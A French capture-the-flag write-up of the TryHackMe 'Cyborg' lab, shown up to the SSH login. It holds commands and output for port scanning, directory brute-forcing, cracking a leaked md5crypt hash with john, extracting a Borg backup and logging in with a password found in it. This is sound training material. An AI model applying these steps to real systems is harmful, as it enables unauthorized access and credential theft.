https://tryhackme.com/room/cyborg
Reconnaissance
root@ip-10-10-91-98:~# nmap -sC -sV 10.10.25.160
Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-16 23:48 GMT
Nmap scan report for ip-10-10-25-160.eu-west-1.compute.internal (10.10.25.160)
Host is up (0.013s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:86:F1:06:ED:67 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.03 seconds
2 ports sont ouverts: 22 (SSH) et 80 (HTTP).
Il nous reste à trouver les flags user.txt et root.txt
Enumérons les répertoires cachés.
root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirb# gobuster dir -u http://10.10.25.160/ -x php,txt,old,bak,zip,tar -w common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.25.160/
[+] Threads: 10
[+] Wordlist: common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,old,bak,zip,tar
[+] Timeout: 10s
===============================================================
2022/12/16 23:50:56 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.zip (Status: 403)
/.hta.tar (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.hta.old (Status: 403)
/.hta.bak (Status: 403)
/.htaccess (Status: 403)
/.htaccess.old (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.tar (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.tar (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301)
/etc (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2022/12/16 23:50:57 Finished
===============================================================On trouve un répertoire /admin ainsi qu’un dossier /etc
Le dossier /etc comporte un sous-dossier /squid.
root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirbuster# gobuster dir -u http://10.10.25.160/etc/ -w directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.25.160/etc/
[+] Threads: 10
[+] Wordlist: directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2022/12/16 23:54:46 Starting gobuster
===============================================================
/squid (Status: 301)
===============================================================
2022/12/16 23:55:16 Finished
===============================================================Celui-ci contient un fichier passwd.
root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirbuster# curl -s http://10.10.25.160/etc/squid/ | html2text
****** Index of /etc/squid ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory -
[[ ]] passwd 2020-12-30 02:09 52
[[ ]] squid.conf 2020-12-30 02:09 258
===========================================================================
Apache/2.4.18 (Ubuntu) Server at 10.10.25.160 Port 80
Ce fichier nous révèle l’utilisateur music_archive ainsi qu’un mot de passe chiffré.
root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirbuster# curl -s http://10.10.25.160/etc/squid/passwd | html2text
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Nous allons utiliser john pour cracker ce mot de passe.
root@ip-10-10-91-98:~/Desktop/Tools/Password Attacks/john# john passwd.hash --wordlist=/root/Desktop/Tools/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-opencl"
Use the "--format=md5crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward (?)
1g 0:00:00:00 DONE (2022-12-17 00:14) 3.125g/s 121800p/s 121800c/s 121800C/s 112704..salsabila
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
On trouve le mot de passe squidward.
Revenons maintenant au dossier admin.
On trouve un fichier archive.tar
root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirb# gobuster dir -u http://10.10.25.160/admin/ -x php,txt,old,bak,zip,tar -w common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.25.160/admin/
[+] Threads: 10
[+] Wordlist: common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: bak,zip,tar,php,txt,old
[+] Timeout: 10s
===============================================================
2022/12/17 00:21:10 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.old (Status: 403)
/.hta.bak (Status: 403)
/.hta.zip (Status: 403)
/.hta.tar (Status: 403)
/.hta.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.old (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.tar (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.tar (Status: 403)
/archive.tar (Status: 200)
/index.html (Status: 200)
===============================================================
2022/12/17 00:21:13 Finished
===============================================================
On récupère ce fichier archive.tar et on regarde ce qu’il contient.
root@ip-10-10-91-98:~# wget http://10.10.25.160/admin/archive.tar
--2022-12-17 00:23:00-- http://10.10.25.160/admin/archive.tar
Connecting to 10.10.25.160:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1566720 (1.5M) [application/x-tar]
Saving to: \u2018archive.tar\u2019
archive.tar 100%[===================>] 1.49M --.-KB/s in 0.01s
2022-12-17 00:23:00 (125 MB/s) - \u2018archive.tar\u2019 saved [1566720/1566720]
root@ip-10-10-91-98:~# tar xf archive.tar
root@ip-10-10-91-98:~# tree home/
home/
└── field
└── dev
└── final_archive
├── config
├── data
│ └── 0
│ ├── 1
│ ├── 3
│ ├── 4
│ └── 5
├── hints.5
├── index.5
├── integrity.5
├── nonce
└── README
5 directories, 10 files
root@ip-10-10-91-98:~# cat home/field/dev/final_archive/README
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/
Il faut donc aller voir les commandes sur ce site.
Nous allons d’abord lister toutes les archives du repository. Un mot de passe sera demandé (celui trouvé un peu plus haut).
root@ip-10-10-91-98:~# borg list home/field/dev/final_archive/
Enter passphrase for key /root/home/field/dev/final_archive:
music_archive Tue, 2020-12-29 14:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
Nous faisons de même pour music_archive…
root@ip-10-10-91-98:~# borg list home/field/dev/final_archive::music_archive
Enter passphrase for key /root/home/field/dev/final_archive:
drwxr-xr-x alex alex 0 Tue, 2020-12-29 13:55:52 home/alex
-rw-r--r-- alex alex 3637 Mon, 2020-12-28 14:25:14 home/alex/.bashrc
-rw-r--r-- alex alex 220 Mon, 2020-12-28 14:25:14 home/alex/.bash_logout
-rw-r--r-- alex alex 675 Mon, 2020-12-28 14:25:14 home/alex/.profile
drwxrwxr-x alex alex 0 Mon, 2020-12-28 18:00:24 home/alex/Music
-rw------- alex alex 439 Mon, 2020-12-28 17:26:45 home/alex/.bash_history
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.dbus
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.dbus/session-bus
-rw-r--r-- root root 464 Mon, 2020-12-28 16:33:47 home/alex/.dbus/session-bus/c707f46991feb1ed17e415e15fe9cdae-0
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript
-rw-r--r-- root root 7046 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript/ActionScript.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript
-rw-r--r-- root root 8934 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript/AppleScript.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP
-rw-r--r-- root root 7254 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP/ASP.sublime-syntax.cache
-rw-r--r-- root root 640 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP/HTML-ASP.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Batch File
-rw-r--r-- root root 4850 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Batch File/Batch File.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#
-rw-r--r-- root root 604 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#/Build.sublime-syntax.cache
-rw-r--r-- root root 17237 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#/C#.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++
-rw-r--r-- root root 11817 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++/C.sublime-syntax.cache
-rw-r--r-- root root 15283 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++/C++.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Clojure
-rw-r--r-- root root 2814 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Clojure/Clojure.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/CSS
-rw-r--r-- root root 17947 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/CSS/CSS.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D
-rw-r--r-- root root 18692 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D/D.sublime-syntax.cache
-rw-r--r-- root root 287 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D/DMD Output.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Diff
-rw-r--r-- root root 806 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Diff/Diff.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang
-rw-r--r-- root root 5881 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/Erlang.sublime-syntax.cache
-rw-r--r-- root root 257 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/HTML (Erlang).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats
-rw-r--r-- root root 1607 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Attributes.sublime-syntax.cache
-rw-r--r-- root root 3096 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Commit.sublime-syntax.cache
-rw-r--r-- root root 1314 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Common.sublime-syntax.cache
-rw-r--r-- root root 1911 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Config.sublime-syntax.cache
-rw-r--r-- root root 328 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Ignore.sublime-syntax.cache
-rw-r--r-- root root 742 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Link.sublime-syntax.cache
-rw-r--r-- root root 473 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Log.sublime-syntax.cache
-rw-r--r-- root root 1342 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Rebase.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Go
-rw-r--r-- root root 7366 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Go/Go.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz
-rw-r--r-- root root 1506 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz/DOT.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Groovy
-rw-r--r-- root root 5574 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Groovy/Groovy.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell
-rw-r--r-- root root 2859 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Haskell.sublime-syntax.cache
-rw-r--r-- root root 588 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Literate Haskell.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/HTML
-rw-r--r-- root root 5979 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/HTML/HTML.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java
-rw-r--r-- root root 9275 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java.sublime-syntax.cache
-rw-r--r-- root root 909 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java Server Pages (JSP).sublime-syntax.cache
-rw-r--r-- root root 1661 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaDoc.sublime-syntax.cache
-rw-r--r-- root root 575 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaProperties.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript
-rw-r--r-- root root 16252 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JavaScript.sublime-syntax.cache
-rw-r--r-- root root 1561 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JSON.sublime-syntax.cache
-rw-r--r-- root root 1294 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/Regular Expressions (JavaScript).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX
-rw-r--r-- root root 1079 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/Bibtex.sublime-syntax.cache
-rw-r--r-- root root 10203 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX.sublime-syntax.cache
-rw-r--r-- root root 668 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX Log.sublime-syntax.cache
-rw-r--r-- root root 1788 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/TeX.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lisp
-rw-r--r-- root root 5115 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lisp/Lisp.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lua
-rw-r--r-- root root 5353 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lua/Lua.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile
-rw-r--r-- root root 234 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Make Output.sublime-syntax.cache
-rw-r--r-- root root 4762 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Makefile.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown
-rw-r--r-- root root 11172 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/Markdown.sublime-syntax.cache
-rw-r--r-- root root 393 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/MultiMarkdown.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Matlab
-rw-r--r-- root root 26157 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Matlab/Matlab.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C
-rw-r--r-- root root 25087 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C.sublime-syntax.cache
-rw-r--r-- root root 15819 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C++.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml
-rw-r--r-- root root 430 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/camlp4.sublime-syntax.cache
-rw-r--r-- root root 6237 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCaml.sublime-syntax.cache
-rw-r--r-- root root 1659 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamllex.sublime-syntax.cache
-rw-r--r-- root root 1623 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamlyacc.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Pascal
-rw-r--r-- root root 1171 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Pascal/Pascal.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Perl
-rw-r--r-- root root 8858 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Perl/Perl.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP
-rw-r--r-- root root 447 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/PHP/PHP.sublime-syntax.cache
-rw-r--r-- root root 32165 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP/PHP Source.sublime-syntax.cache
-rw-r--r-- root root 1248 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP/Regular Expressions (PHP).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python
-rw-r--r-- root root 17292 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python/Python.sublime-syntax.cache
-rw-r--r-- root root 1130 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python/Regular Expressions (Python).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R
-rw-r--r-- root root 14814 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/R.sublime-syntax.cache
-rw-r--r-- root root 219 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/R Console.sublime-syntax.cache
-rw-r--r-- root root 1177 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/Rd (R Documentation).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails
-rw-r--r-- root root 427 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/HTML (Rails).sublime-syntax.cache
-rw-r--r-- root root 388 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/JavaScript (Rails).sublime-syntax.cache
-rw-r--r-- root root 985 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby Haml.sublime-syntax.cache
-rw-r--r-- root root 1486 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby on Rails.sublime-syntax.cache
-rw-r--r-- root root 304 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/SQL (Rails).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions
-rw-r--r-- root root 2985 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions/RegExp.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText
-rw-r--r-- root root 1611 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText/reStructuredText.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Ruby
-rw-r--r-- root root 9901 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Ruby/Ruby.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust
-rw-r--r-- root root 228 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Cargo.sublime-syntax.cache
-rw-r--r-- root root 8561 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Rust.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Scala
-rw-r--r-- root root 13481 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Scala/Scala.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript
-rw-r--r-- root root 10255 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Bash.sublime-syntax.cache
-rw-r--r-- root root 7668 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/commands-builtin-shell-bash.sublime-syntax.cache
-rw-r--r-- root root 158 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Shell-Unix-Generic.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/SQL
-rw-r--r-- root root 2724 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/SQL/SQL.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL
-rw-r--r-- root root 1010 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL/HTML (Tcl).sublime-syntax.cache
-rw-r--r-- root root 4120 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL/Tcl.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text
-rw-r--r-- root root 92 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.cache
-rw-r--r-- root root 43 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.rcache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Textile
-rw-r--r-- root root 1783 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Textile/Textile.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/XML
-rw-r--r-- root root 2344 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/XML/XML.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/YAML
-rw-r--r-- root root 3850 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/YAML/YAML.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default
-rw-r--r-- root root 4086 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Syntax Summary.cache
-rw-r--r-- root root 10895 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Meta Info Summary.cache
-rw-r--r-- root root 1003914 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Startup.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Packages
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Packages/User
drwx------ root root 0 Mon, 2020-12-28 16:38:24 home/alex/.config/sublime-text-3/Local
-rw-r--r-- root root 5199 Mon, 2020-12-28 16:38:24 home/alex/.config/sublime-text-3/Local/Auto Save Session.sublime_session
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Lib
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Lib/python3.3
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Installed Packages
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/ibus
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/ibus/bus
drwxrwxr-x alex alex 0 Tue, 2020-12-29 13:55:52 home/alex/Documents
-rw-r--r-- root root 110 Tue, 2020-12-29 13:55:41 home/alex/Documents/note.txt
drwxrwxr-x alex alex 0 Mon, 2020-12-28 17:59:30 home/alex/Public
drwxrwxr-x alex alex 0 Mon, 2020-12-28 17:59:37 home/alex/Videos
drwxrwxr-x alex alex 0 Tue, 2020-12-29 13:57:14 home/alex/Desktop
-rw-r--r-- root root 71 Tue, 2020-12-29 13:57:14 home/alex/Desktop/secret.txt
drwxrwxr-x alex alex 0 Mon, 2020-12-28 17:59:57 home/alex/Downloads
drwxrwxr-x alex alex 0 Mon, 2020-12-28 18:00:02 home/alex/Templates
drwxrwxr-x alex alex 0 Mon, 2020-12-28 18:26:44 home/alex/Pictures
Nous allons extraire ces fichiers !
En plus de field, nous avons maintenant alex !
home/
└── alex
├── Desktop
│ └── secret.txt
├── Documents
│ └── note.txt
├── Downloads
├── Music
├── Pictures
├── Public
├── Templates
└── VideosNous avons 2 fichiers intéressants: secret.txt et note.txt
root@ip-10-10-91-98:~# cat home/alex/Desktop/secret.txt
shoutout to all the people who have gotten to this stage whoop whoop!"
root@ip-10-10-91-98:~# cat home/alex/Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3
On obtient le mot de passe d’Alex.
Connectons-nous en SSH !
root@ip-10-10-91-98:~# ssh alex@10.10.25.160
The authenticity of host '10.10.25.160 (10.10.25.160)' can't be established.
ECDSA key fingerprint is SHA256:uB5ulnLcQitH1NC30YfXJUbdLjQLRvGhDRUgCSAD7F8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.25.160' (ECDSA) to the list of known hosts.
alex@10.10.25.160's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
27 packages can be updated.
0 updates are security updates.
